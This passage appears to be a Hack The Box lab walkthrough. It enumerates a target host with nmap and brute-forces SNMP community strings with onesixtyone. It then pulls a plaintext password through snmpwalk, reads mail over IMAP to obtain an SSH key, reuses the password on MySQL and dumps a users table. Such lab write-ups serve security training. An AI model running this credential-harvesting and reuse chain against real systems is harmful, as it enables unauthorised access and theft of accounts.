Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.04 seconds

IMAP and POP3 both require credentials for us to do anything with them.

We’re going to scan UDP ports

$ sudo nmap -sU --top-ports 100 10.129.18.134 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 08:16 -0500
Nmap scan report for 10.129.18.134
Host is up (0.15s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
161/udp  open          snmp
1900/udp open|filtered upnp

Nmap done: 1 IP address (1 host up) scanned in 109.38 seconds

SNMP is open, we can start footprinting the service.

We’ll use onesixtyone to brute-force community string names

1
2
3

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.18.134 
Scanning 1 hosts, 3219 communities
10.129.18.134 [backup] Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

We found the community string backup

Querying the OIDs using snmpwalk, we found user credentials

$ snmpwalk -v2c -c backup 10.129.18.134 

<-SNIP->

iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"

<-SNIP->

iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"

<-SNIP->

We can now login to IMAP or POP3 using these credentials: tom:NMds732Js2761

$ curl -k 'imaps://10.129.18.134' --user tom:NMds732Js2761                 
* LIST (\HasNoChildren) "." Notes
* LIST (\HasNoChildren) "." Meetings
* LIST (\HasNoChildren \UnMarked) "." Important
* LIST (\HasNoChildren) "." INBOX

The email we found contains an SSH key

$ curl -k 'imaps://10.129.18.134/Meetings' -X 'UID SEARCH ALL' --user tom:NMds732Js2761
* SEARCH
$ curl -k 'imaps://10.129.18.134/Important' -X 'UID SEARCH ALL' --user tom:NMds732Js2761
* SEARCH
$ curl -k 'imaps://10.129.18.134/INBOX' -X 'UID SEARCH ALL' --user tom:NMds732Js2761
* SEARCH 1
  
$ curl -k 'imaps://10.129.18.134/INBOX/;UID=1' --user tom:NMds732Js2761
HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY

-----BEGIN OPENSSH PRIVATE KEY-----

<-SNIP->

-----END OPENSSH PRIVATE KEY-----

We’re going to save the key to a file

1	`$ vim tom_key`

Fix file permissions.

1	`$ chmod 600 tom_key`

SSH login using the key

1
2
3

$ ssh -i tom_key tom@10.129.18.134

tom@NIXHARD:~$

We find MySQL present in local system accounts

tom@NIXHARD:/$ cat /etc/passwd
<-SNIP->
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
<-SNIP->

Let’s try to login using the credentials we have for tom

tom@NIXHARD:~$ mysql -u tom -p'NMds732Js2761'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Enumerating the database, we found HTB‘s credentials

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| users              |
+--------------------+
5 rows in set (0.03 sec)

mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
+------+-------------------+------------------------------+
| id   | username          | password                     |
+------+-------------------+------------------------------+
<-SNIP->
|  150 | HTB               | cr3n4o7rzse7rzhnckhssncif7ds |
<-SNIP->
+------+-------------------+------------------------------+
200 rows in set (0.00 sec)